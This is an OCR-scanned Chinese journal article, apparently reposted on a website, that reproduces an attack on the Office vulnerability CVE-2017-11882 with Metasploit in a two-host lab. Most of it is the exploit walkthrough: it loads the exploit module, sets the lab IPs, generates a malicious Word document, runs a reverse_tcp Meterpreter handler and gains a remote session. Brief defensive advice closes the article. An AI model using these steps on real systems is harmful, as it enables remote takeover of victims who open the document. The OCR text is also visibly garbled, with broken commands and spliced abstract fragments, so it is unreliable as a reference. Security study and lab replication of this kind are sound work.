信IB与电厢
China Computer&Communication
网絡与通信鞍术2020年第23期基于Metasploit的Office漏洞CVE-2017-11882
攻击复现
田腾浩高璐张億川
(武警士官学校网络管理系,浙江杭州310012)
摘要:Office漏洞CVE-2017-11882对计算机的危害较大,而Metasploit集成T CVE-2017-11882的漏洞利用模块,只使用Metasploit就可以独立完成CVE-2017-11882的漏洞攻击.为了加强计算机安全防护,需要采取不随意点击不明文件、安装防护软件和更新补丁等措施.
关键词:CVE-2017-11882;Metasploit;更新补丁
中图分类号:TP393文献标识码:A文章编号:1003-9767(2020)23-186-02
Recurrence of CVE-2017-11882Attack of Office Vulnerability Based on
Metasploit
TIAN Tenghao,GAO Lu,ZHANG Yichuan
(Department of Network Management,Noncommissioned Officer Academy of PAP,Hangzhou Zhejiang310012,China) Abstract:Office vulnerability CVE-2017-11882does great harm to the computer,while Metasploit integrates the vulnerability exploitation module of CVE-2017-11882,and only using Metasploit can independently complete the vulnerability attack of CVE-
2017-11882.In order to strengthen computer security protection, installing protection software and updating patches.
Keywords:CVE-2017-11882;Metasploit;update patches
1相关概念
人们普遍认为随意点击EXE文件,计算机可能会中病毒或被黑客控制,因此对不明EXE文件的警惕性较高。人们对Word文档、视频、音乐等非可执行文件一般比较信任。实际上,打开一个Word文档,也有可能会被黑客控制[1'5]o
1.1Office漏洞CVE-2017-11882
微软于2017年11月14日发布了一份安全补丁,其中最引人关注的就是Office远程代码执行漏洞CVE-2017-11882。攻击者可以利用该漏洞制作恶意的Word文档,而一旦受害者打开该Word文档,就会被攻击者控制。该漏洞已经存在17年之久,并且影响Office2000至Office2016几乎所有版本的Office。该漏洞危害较大,已被某些APT组织纳入攻击武器库。反观广大普通用户,却没有引起足够重视,该漏洞依然普遍存在。
1.2Metasploit
Metasploit是一款优秀的开源渗透测试框架,集成了丰作者简介:田腾浩(1989-),男,河北蠡县人,硕士研究生,we need to take measures such as not clicking on unknown files,
富的漏洞检测和利用模块。相对来说,Metasploit的操作使用并不复杂,为网络安全人员检测和利用计算机漏洞提供了极大的便利,已经成为网络安全人员的必备工具之一。并且,Metasploit的漏洞利用模块实时更新,囊括了最新的漏洞检测和利用工具。Metasploit很早就集成了CVE-2017-11882的漏洞利用模块,只使用Metasploit就可以独立完成CVE-2017-11882的漏洞攻击。然而,目前所能看到的CVE-2017-11882漏洞复现文章,除了Metasploit以外还使用了webdav_exec_CVE-2017-11882.py和Commandl09b_ CVE-2017-11882.py等Python脚本作为辅助。下面,通过实操演示基于Metasploit的Office漏洞CVE-2017-11882攻击复现。
2攻击复现
2.1搭建环境
攻击主机与受害主机的IP设置如表]所示。
讲师。研究方向:网络技术、网络安全。
信■与电BS
China Computer & Communication
网絡与通信就术
2020年第23期
2.2 Metasploit 生成恶意 Word
表1环境设置
角系统
IP
攻击主机KaliLinux (自带 Metasploit )
192.16 &1.1受害主机
Windows 7 (安装 Office2016)
192.16 &1.2
(1) 检索 CVE-2017-11882 模块,命令:search CVE-2017-
11882O
(2) 加载 CVE-2017-11882 模块,命令:use exploit/
windows/fileformat/o ffice_ms 17 11882 o
(3 )查看需要设置的参数,命令为:show options,如
图]所示。
图 1 CVE-2017-11882 的 payload 参数设置
从图1可以看到,该模块使用的payload 为windows/
meterpreter/reverse tcp ,并且没有监听模块,因此需要另外
设置 windows/meterpreter/reverse_tcp 的监听模块。
(4 )设置office_msl7_11882的服务器IP 地址,命令:
set SRVHOST 192.168.1.1c
(5 )设置payload 监听主机的IP 地址,命令:set
LHOST 192.168.1.l o
(6)生成恶意Word 文档,命令:run o 如图2所示,
在/root/.msf4/local/目录下生成了恶意文档f 。
图2生成恶意文档f
2.3开启监听并控制受害主机
(1)加载监听模块,命令:use exploit/multi/handler 0
(2 )设置 payload,命令:set payload windows/meterpreter/ reverse_tcpo
(3 )设置payload 监听主机的IP 地址,命令:set
LHOST 192.168.1.l o
(4) 开启监听,命令:run o
(5) 将2.2中生成的恶意文档f 发送给受害主
机,受害主机打开F 。如图3所示,在监听界面获得
T meterpreter 连接,说明攻击主机已经成功入侵了受害
主机。
图3获得meterpreter 连接
3结语cve漏洞库
通过Office 漏洞CVE-2017-11882攻击复现可以发现: 点击不明Word 文档也可能会被入侵。为了做好安全防护,
应该做到以下3点:一是增强网络安全意识,不随意点击不 明文件;二是为计算机安装必要的防护软件;三是做好系统
补丁的更新和安装。
参考文献
[1 ]Microsoft.Microsoft Office 内存损坏漏洞[EB/OL]. (2017-11-14) [2020-12-01 ]. http s : //p o rt a l . m src . m icro s o ft . c om/
en-U S /security-guidance/advisory/C V E-2017-11882.
[2] 安天.安天对CVE-2017-11882漏洞利用样本的检测
与防御[EB/OL].(2017-12-08)[2020-12-01].www.antiy .
cn/research/notice&report/research_report/20171208.html.
[3] 安天.CVE-2017-11882漏洞分析、利用及动态检
测[EB/OL].(2017-ll-24)[2020-12-01],www.anquanke .
com/post/id/87311.
[4] IS_wen.CVE-2017-l 1882 漏洞复现和利用[EB/OL].(2017-
11 -27) [2020-12-01] .www.freebu£com/vuls/l 54978.html.
[5] [英]尼普恩•贾斯瓦尔.精通Metasploit 渗透测试[M].
第3版.李华,译.北京:人民邮电出版社,2019.
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论